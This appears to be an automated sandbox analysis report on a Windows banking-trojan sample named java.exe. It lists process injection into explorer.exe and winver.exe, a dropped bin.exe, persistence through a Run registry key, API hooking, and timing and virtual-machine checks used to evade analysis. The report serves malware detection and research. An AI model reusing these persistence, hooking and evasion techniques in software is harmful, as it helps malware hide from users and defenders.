            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 36_2_02BB0E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 36_2_02BB1821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 37_2_02561821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 37_2_02560E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 38_2_02611821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 38_2_02610E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 39_2_02521821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 39_2_02520E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 40_2_02B20E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 40_2_02B21821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 41_2_01451821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 41_2_01450E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 42_2_02621821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 42_2_02620E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 43_2_00EE0E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 43_2_00EE1821
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 44_2_02D30E85
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: 44_2_02D31821
            Source: C:\Windows\System32\conhost.exe | Code function: String function: 00E63653 appears 35 times
            Source: C:\Windows\SysWOW64\winver.exe | Code function: String function: 02F03653 appears 35 times
            Source: C:\Windows\System32\svchost.exe | Code function: String function: 00223653 appears 35 times
            Source: C:\Windows\System32\svchost.exe | Code function: String function: 00913653 appears 35 times
            Source: C:\Windows\System32\svchost.exe | Code function: String function: 009A3653 appears 35 times
            Source: C:\Windows\System32\svchost.exe | Code function: String function: 00D43653 appears 35 times
            Source: C:\Windows\System32\ctfmon.exe | Code function: String function: 00A53653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: String function: 02563653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: String function: 02B23653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: String function: 02BB3653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: String function: 02523653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: String function: 02863653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: String function: 02623653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: String function: 01453653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: String function: 02D33653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: String function: 02613653 appears 35 times
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Code function: String function: 00EE3653 appears 35 times
            Source: C:\Windows\explorer.exe | Code function: String function: 013A3653 appears 34 times
            Source: C:\Windows\explorer.exe | Code function: String function: 01383653 appears 35 times
            Source: C:\Windows\System32\ApplicationFrameHost.exe | Code function: String function: 00183653 appears 35 times
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exe | Code function: String function: 00013653 appears 35 times
            Source: C:\Windows\System32\smartscreen.exe | Code function: String function: 00293653 appears 35 times
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: String function: 00B53653 appears 35 times
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: String function: 02383677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: String function: 023A3677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: String function: 001C3653 appears 70 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00943653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00193653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 003D3653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00113653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00903653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00B03653 appears 35 times
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: String function: 00AB3653 appears 35 times
            Source: C:\Windows\System32\sihost.exe | Code function: String function: 00AC3653 appears 35 times
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe | Code function: String function: 00583653 appears 35 times
            Source: C:\Windows\System32\dllhost.exe | Code function: String function: 006E3653 appears 35 times
            Source: C:\Users\user\Desktop\java.exe | Code function: String function: 02263677 appears 34 times
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Section loaded: nss3.dll
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Section loaded: nss3.dll
            Source: C:\Program Files (x86)\CHDTFKSvlOkHQvcyyyfBoeAKnjFkHGMVwUaDzSeMcICpGcJJICWtNWz\qqQDbrYlXafmy.exe | Section loaded: nss3.dll
            Source: java.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: classification engine | Classification label: mal100.bank.expl.evad.winEXE@10/12@14/3
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02260005 ExitProcess,GetProcAddress,IsWow64Process,GetModuleHandleW,GetStartupInfoA,ReadFile,WriteFile,SetFilePointer,CloseHandle,CreateToolhelp32Snapshot,Process32Next,OpenProcess,VirtualFree,VirtualAllocEx,CreateMutexA
            Source: C:\Windows\SysWOW64\winver.exe | File created: C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\F90F00A9
            Source: C:\Windows\SysWOW64\winver.exe | Mutant created: \Sessions\1\BaseNamedObjects\F90F00A9
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
            Source: C:\Windows\explorer.exe | File read: C:\Users\user\Searches\desktop.ini
            Source: C:\Users\user\Desktop\java.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: java.exe | ReversingLabs: Detection: 89%
            Source: unknown | Process created: C:\Users\user\Desktop\java.exe C:\Users\user\Desktop\java.exe
            Source: C:\Users\user\Desktop\java.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\java.exe | Process created: C:\Windows\SysWOW64\winver.exe winver
            Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe "C:\Users\user\AppData\Roaming\F90F00A9\bin.exe"
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe "C:\Users\user\AppData\Roaming\F90F00A9\bin.exe"
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\java.exe | Process created: C:\Windows\SysWOW64\winver.exe winver
            Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe "C:\Users\user\AppData\Roaming\F90F00A9\bin.exe"
            Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe "C:\Users\user\AppData\Roaming\F90F00A9\bin.exe"
            Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: java.exe | Static PE information: section name: .imports
            Source: bin.exe.2.dr | Static PE information: section name: .imports
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02260C1A push edi; ret 0_2_02260C56
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02260B89 push edi; ret 0_2_02260C56
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_02F00B65 push edi; ret 2_2_02F00C32
            Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_02F00BF6 push edi; ret 2_2_02F00C32
            Source: C:\Windows\explorer.exe | Code function: 3_2_01380B65 push edi; ret 3_2_01380C32
            Source: C:\Windows\explorer.exe | Code function: 3_2_01380BF6 push edi; ret 3_2_01380C32
            Source: C:\Windows\explorer.exe | Code function: 3_2_013A0B65 push edi; ret 3_2_013A0C32
            Source: C:\Windows\explorer.exe | Code function: 3_2_013A0BF6 push edi; ret 3_2_013A0C32
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC0BF6 push edi; ret 4_2_00AC0C32
            Source: C:\Windows\System32\sihost.exe | Code function: 4_2_00AC0B65 push edi; ret 4_2_00AC0C32
            Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00910BF6 push edi; ret 5_2_00910C32
            Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00910B65 push edi; ret 5_2_00910C32
            Source: C:\Windows\System32\svchost.exe | Code function: 6_2_009A0BF6 push edi; ret 6_2_009A0C32
            Source: C:\Windows\System32\svchost.exe | Code function: 6_2_009A0B65 push edi; ret 6_2_009A0C32
            Source: C:\Windows\System32\ctfmon.exe | Code function: 7_2_00A50BF6 push edi; ret 7_2_00A50C32
            Source: C:\Windows\System32\ctfmon.exe | Code function: 7_2_00A50B65 push edi; ret 7_2_00A50C32
            Source: C:\Windows\System32\svchost.exe | Code function: 8_2_00D40BF6 push edi; ret 8_2_00D40C32
            Source: C:\Windows\System32\svchost.exe | Code function: 8_2_00D40B65 push edi; ret 8_2_00D40C32
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: 9_2_00B50BF6 push edi; ret 9_2_00B50C32
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Code function: 9_2_00B50B65 push edi; ret 9_2_00B50C32
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 10_2_00110B65 push edi; ret 10_2_00110C32
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 10_2_00110BF6 push edi; ret 10_2_00110C32
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: 12_2_001C0B65 push edi; ret 12_2_001C0C32
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | Code function: 12_2_001C0BF6 push edi; ret 12_2_001C0C32
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_02380C1A push edi; ret 12_2_02380C56
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_02381A92 push esi; ret 12_2_02381A94
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_02381B61 push esi; ret 12_2_02381B63
            Source: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeCode function: 12_2_02380B89 push edi; ret 12_2_02380C56
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 15_2_00AB0BF6 push edi; ret 15_2_00AB0C32
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 15_2_00AB0B65 push edi; ret 15_2_00AB0C32
            Source: C:\Windows\System32\smartscreen.exeCode function: 16_2_00290B65 push edi; ret 16_2_00290C32
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: C:\Windows\SysWOW64\winver.exeFile created: C:\Users\user\AppData\Roaming\F90F00A9\bin.exeJump to dropped file

            Boot Survival

            Source: C:\Windows\SysWOW64\winver.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run F90F00A9
            Source: C:\Windows\SysWOW64\winver.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run F90F00A9
            Source: C:\Windows\SysWOW64\winver.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run F90F00A9

            Hooking and other Techniques for Hiding and Protection

            Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
            Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
            Source: explorer.exe | User mode code has changed: module: ntdll.dll function: ZwResumeThread new code: 0xE9 0x9E 0xE1 0x12 0x25 0x51
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\SysWOW64\winver.exe | RDTSC instruction interceptor: First address: 0000000002F02FAD second address: 0000000002F02FD6 instructions:
                0x00000000 rdtsc
                0x00000002 mov eax, edx
                0x00000004 stosd
                0x00000005 mov eax, dword ptr [ebx+004042B5h]
                0x0000000b stosd
                0x0000000c mov eax, dword ptr [ebx+004042B9h]
                0x00000012 stosd
                0x00000013 mov eax, dword ptr [ebx+00406820h]
                0x00000019 stosd
                0x0000001a mov eax, dword ptr [ebx+00406824h]
                0x00000020 stosd
                0x00000021 lea eax, dword ptr [ebp-00000700h]
                0x00000027 sub edi, eax
                0x00000029 rdtsc
            Source: C:\Users\user\Desktop\java.exe | Code function: 0_2_02260005 rdtsc 0_2_02260005
            Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 733
            Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 712
            Source: C:\Windows\SysWOW64\winver.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_2-3165
            Source: C:\Windows\SysWOW64\winver.exe TID: 7412 | Thread sleep count: 271 > 30
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\winver.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\winver.exe | Last function: Thread delayed
            Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\ctfmon.exe | Last function: Thread delayed
            Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe | Last function: Thread delayed
            Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe | Last function: Thread delayed
            Source: C:\Windows\System32\smartscreen.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe | Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe | Last function: Thread delayed
            Source: C:\Windows\System32\ApplicationFrameHost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe | Last function: Thread delayed
            Source: C:\Windows\System32\oobe\UserOOBEBroker.exe | Last function: Thread delayed
            Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\dllhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe | Last function: Thread delayed
            Source: C:\Windows\System32\RuntimeBroker.exe | Last function: Thread delayed
            Source: explorer.exe, 00000003.00000000.1638532845.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBD5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmware horizon client
            Source: SearchApp.exe, 0000000B.00000000.1760446370.0000024B42264000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: com.nicehash.nhm1251102507VMware.View.Client
            Source: SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|vmware workstation 15 player*|vmplayer6438
            Source: explorer.exe, 00000003.00000002.2901515644.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
            Source: explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: SearchApp.exe, 0000000B.00000003.1812027096.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|*|qemu10642
            Source: svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;I!
            Source: explorer.exe, 00000003.00000002.3032615601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1637966604.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3032615601.000000000982D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1717426003.0000019E29F00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2940071655.0000019E29F00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBD5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmware workstation 12 player
            Source: SearchApp.exe, 0000000B.00000000.1747233145.00000243400AB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
            Source: svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;nlse]
            Source: SearchApp.exe, 0000000B.00000003.1812027096.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|hyper-v manager*|hyperv4178
            Source: explorer.exe, 00000003.00000002.3041105385.0000000009977000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: SearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1765512807.0000024B42D43000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1757604184.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: var fbpkgiid = fbpkgiid || {}; fbpkgiid.page = '';;(function(BingAtWork) { if (typeof (bfbWsbTel) !== "undefined") { BingAtWork.WsbWebTelemetry.init({"cfg":{"e":true,"env":"PROD","t":"33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176"},"ig":"892FA07886414BDF8EE1764A59FF39C6","ConversationId":"21139c92-d559-45ad-9d8f-73e2a64bf7e7","LogicalId":"30363daf-0e99-4b56-afae-f0c5eee8522a","tid":"651d53d035ec4c7eba14a4092e8aedb0","sid":"193A581F83766B4319784BBF829B6A16","uid":"","muid":"6666694284484FA1B35CCB433D42E997","puid":null,"isMtr":false,"tn":null,"tnid":null,"msa":false,"mkt":"en-us","b":"edge","eref":"Ref A: 651d53d035ec4c7eba14a4092e8aedb0 Ref B: MWHEEEAP0024F6D Ref C: 2023-10-04T12:00:16Z","vs":{"BAW12":"BFBBCEJIT2","BAW2":"BFBSPRC","BAW5":"PREMSBCUSTVERT","BAW7":"BFBPROWSBINITCF","CLIENT":"WINDOWS","COLUMN":"SINGLE","FEATURE.BFBBCEJIT":"1","FEATURE.BFBBCEJIT2":"1","FEATURE.BFBEDUQWQSCLKWSB":"1","FEATURE.BFBPROWSBINITCF":"1","FEATURE.BFBREFRPLAN":"1","FEATURE.BFBSPRC":"1","FEATURE.BFBWSBRS0830TF":"1","FEATURE.MSAAUTOJOIN":"1","FEATURE.MSBDSBIGLEAM":"1","FEATURE.MSBDSBORGV2":"1","FEATURE.MSBDSBORGV2CO":"1","FEATURE.MSBWDSBI920T1":"1","FEATURE.MSNSBT1":"1","FEATURE.WSBREF-T":"1","MKT":"EN-US","MS":"0","NEWHEADER":"1","THEME":"THBRAND","UILANG":"EN"},"dev":"DESKTOP","os":"WINDOWS","osver":"11","dc":"CoreUX-Prod-MWHE01","canvas":"","sci":true,"isMidgardEnabled":true,"isHomepage":false,"snrVersion":"2023.10.03.39942242"}); } })(BingAtWork || (BingAtWork = 
{}));;_w.rms.js({'A:rms:answers:BoxModel:Framework':'https:\/\/r.bing.com\/rb\/18\/jnc,nj\/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
            Source: SearchApp.exe, 0000000B.00000003.1809228860.0000024B5CBDE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1812027096.0000024B5A502000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBDE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1823735672.0000024B55C00000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: *|hyper-v manager*|virtual5441
            Source: SearchApp.exe, 0000000B.00000000.1760446370.0000024B42264000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware.View.Client
            Source: SearchApp.exe, 0000000B.00000003.1812374144.0000024B5CBD5000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: vmware workstation 15 player
